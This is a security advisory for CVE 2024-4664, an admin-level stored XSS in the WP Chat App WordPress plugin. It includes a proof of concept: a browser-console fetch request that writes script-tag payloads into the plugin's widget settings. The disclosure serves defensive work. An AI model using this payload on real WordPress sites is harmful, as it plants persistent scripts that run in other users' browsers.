WP Chat App < 3.6.5 – Admin+ Stored XSS | CVE 2024-4664

Description

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admins to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.

Proof of Concept

1. Navigate to http://vulnerable-site.tld/wp-admin/admin.php?page=nta_whatsapp_floating_widget

2. Paste and run the following in your browser's console:

await fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    },
    "body": "title=%26lt%3Bscript%26gt%3Balert(/XSS-Text/)%26lt%3B%2Fscript%26gt%3B&isShowBtnLabel=on&btnLabel=%26lt%3Bscript%26gt%3Balert(/XSS/-Label/)%26lt%3B%2Fscript%26gt%3B&btnLabelWidth=156&textColor=%23fff&titleSize=18&descriptionTextSize=12&accountNameSize=14&regularTextSize=11&backgroundColor=%232db742&btnPosition=right&btnLeftDistance=30&btnRightDistance=30&btnBottomDistance=30&isShowPoweredBy=on&scrollHeight=500&responseText=The+team+typically+replies+in+a+few+minutes.&description=Hi!+Click+one+of+our+member+below+to+chat+on+%3Cstrong%3EWhatsApp%3C%2Fstrong%3E&gdprContent=Please+accept+our+%3Ca+href%3D%22https%3A%2F%2Fninjateam.org%2Fprivacy-policy%2F%22%3Eprivacy+policy%3C%2Fa%3E+first+to+start+a+conversation.&time_symbols%5BhourSymbol%5D=h&time_symbols%5BminSymbol%5D=m&showOnDesktop=on&showOnMobile=on&displayCondition=showAllPage&action=njt_wa_save_design_setting&nonce=" + njt_wa["nonce"],
    "method": "POST",
    "mode": "cors"
});

3. Refresh the page, navigate to the "Design" tab, the XSS will be triggered when entering anything in either the "Widget Text" or "Widget Label Text" fields